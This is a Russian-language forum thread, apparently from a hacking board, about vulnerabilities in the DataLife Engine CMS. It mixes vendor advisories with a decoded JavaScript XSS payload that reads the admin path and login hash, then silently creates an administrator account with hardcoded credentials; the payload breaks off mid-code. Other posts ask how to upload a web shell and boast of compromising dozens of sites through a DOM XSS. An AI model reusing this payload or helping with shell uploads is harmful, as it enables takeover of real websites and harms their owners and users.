Пробовал, не але... Есть еще варианты ?

Это дыра на многих сайтах есть или только на твоём?

Других сайтов с данным модулем не находил... Модуль фотогаллерея от "Клуб Админов".

Новая уязвимость

Проблема: Недостаточная фильтрация данных.

Ошибка в версии: 11.2 и ниже

Степень опасности: Высокая

Для исправления откройте файл: /engine/go.php и найдите:

ниже добавьте

Смотрел логи некоторых сайтов, после base64 decode вышло

[HTML]
">

function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="petromadsss@gmail.com";
var objhttp=A();
objhttp.onreadystatechange = function()
{
if (objhttp.readyState == 4)
{
var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ 3wiKQ=='));
var da=r.exec(objhttp.responseText)[2];
r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoL is/KSgnfCIp'));
var dh=r.exec(objhttp.responseText)[2];
objhttp.open("POST",rp+da+'?mod=editusers&action=l ist',true);
objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
objhttp.send('action=adduser&user_hash='+dh+'&mod= editusers&regusername='+ul+'&regpassword='+up+'&re gemail='+um+'&reglevel=1');
var objhttp2=A();
objhttp2.onreadystatechange=function()
{
if(objhttp2.readyState==4)
{
var sd=document.getElementById('LJKwqoiDHqewE');
sd.innerHTML=objhttp2.responseText.replace(/(

Ребята, нужен способ заливки шелла, версия 10.5, форум стоит Xenforo 1.5.14. Может кто чего подскажет? Могу подкинуть Dom XSS, способ для личного пользования нужен)

Баг фикс

Проблема: Недостаточная фильтрация данных в Jquery плагине Masha JS входящем в состав DLE.

Ошибка в версии: 11.3 и ниже

Степень опасности: Высокая

Для исправления скачайте и скопируйте на свой сервер патч: https://dle-news.ru/files/dle113_path.zip

После чего очистите кеш браузера, и кеш скрипта в админпанели. Данный патч предназначен для версии 11.3 и всех версий ниже 11.3.

Кто знает как использовать этот баг с Masha JS?

Это и сесть моя DOM XSS. Я при помощи этой баги слил пару десятков сайтов. Она обходит даже xss аудитор от гугла ласт версии. Можно сделать сценарий на получение админ аккаунта.